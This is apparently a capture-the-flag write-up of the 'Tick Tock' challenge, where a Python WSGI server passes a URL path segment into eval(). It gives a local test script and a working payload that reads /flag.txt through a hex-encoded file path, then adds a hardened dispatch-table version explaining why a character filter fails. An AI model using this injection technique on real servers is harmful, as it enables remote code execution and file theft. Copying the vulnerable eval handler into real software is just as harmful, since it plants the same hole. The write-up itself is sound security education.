Remote code execution by injecting Python code into a Python WSGI server.
Tick Tock
hints: flag in /flag.txt
Possibly my favourite challenge from the CTF. It's a very simple website running on a Python WSGI Server backend. It has a code injection vulnerability in its time feature.
The landing page looks like this:
Interesting regex, might be useful later. When trying to access robots.txt or some random page, we receive the following 404:
Interesting image of the time now. Also, let’s take a look at the source:
<h1>Not Found</h1> <img src="/images/now"/>
Looking at the source and the output, we can see that
http://126.96.36.199:8081/images/now gives you the current time dynamically. It
also looks very very suspiciously similar to the output of
I guessed the following was happening when we pass in our URL:
eval("str(datetime.datetime.%s())" % hack)
where hack is the /image//. Now, looking back at the index page, we can guess that the regex there lists the acceptable characters for this path.
So I wrote the following script to develop my exploit:
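    # Python 2 (the payload below relies on file() and str.decode("hex")).
    import datetime
    import re
    import sys

    def test_hack(hack):
        # Character set copied from the regex on the index page.
        good = re.compile("[0-9 a-z A-Z / \" \+ , ( ) . # \[ \] =]+")
        m = good.match(hack)
        # match() only anchors at the start, so also check that it consumed the whole payload.
        assert m and m.end() == len(hack), "There are invalid characters in your payload"
        # Local stand-in for what the server is guessed to do with the path.
        return eval("str(datetime.datetime.%s())" % hack)

    def main():
        payload = sys.argv[1]  # the payload argument, not the whole argv list
        print test_hack(payload)

    if __name__ == "__main__":
        main()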
Testing my exploit locally:
    $ python testhack.py 'now().ctime()+"["+file("2f666c61672e747874".decode("hex")).read()+"]".upper'
    M[cool long ass flag thing lol]
Attacking the remote server through the URL:
Take a closer look at the generated image:
It contains our flag :D
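
The root cause guessed above, eval() on a path segment guarded only by a character allowlist, shown next to a dispatch-table form that never evaluates the path. This is an added example, not code from the challenge or the original write-up; `render_vulnerable`, `render_safe`, `SAFE_VIEWS` and the harmless `PROBE` string are assumed names, and it is written for Python 3.

```python
import datetime
import re

# Character allowlist as shown on the challenge's index page.
ALLOWED_CHARS = re.compile(r'[0-9 a-z A-Z / " \+ , ( ) . # \[ \] =]+')


def render_vulnerable(hack):
    """Handler as the write-up guesses it: the path text is pasted into eval()."""
    if not ALLOWED_CHARS.fullmatch(hack):
        raise ValueError("invalid characters")
    # Letters, dots, parentheses, quotes and '+' are all allowed, which is
    # already enough to write arbitrary attribute access and calls.
    return eval("str(datetime.datetime.%s())" % hack)


# Hardened form: the path segment is only ever used as a dictionary key.
# Nothing taken from the request is parsed or executed as Python.
SAFE_VIEWS = {
    "now": lambda: str(datetime.datetime.now()),
    "today": lambda: str(datetime.datetime.today()),
}


def render_safe(name):
    """Return the text for a known view; reject every other path segment."""
    try:
        view = SAFE_VIEWS[name]
    except KeyError:
        raise LookupError("unknown view: %r" % name)
    return view()


# Constructed, harmless input: it only upper-cases a literal, but it shows
# that an expression, not just a method name, survives the character filter.
PROBE = 'now().ctime()+"injected".upper'

if __name__ == "__main__":
    print("filter accepts probe:", bool(ALLOWED_CHARS.fullmatch(PROBE)))
    print("vulnerable handler  :", render_vulnerable(PROBE))
    try:
        render_safe(PROBE)
    except LookupError as exc:
        print("safe handler        : rejected,", exc)
    print("safe handler (now)  :", render_safe("now"))
```

A character filter cannot make eval() safe here because the characters needed for a legitimate call such as `now` are the same ones needed to build any other expression; restricting the input to a fixed set of names removes the interpreter from the request path entirely.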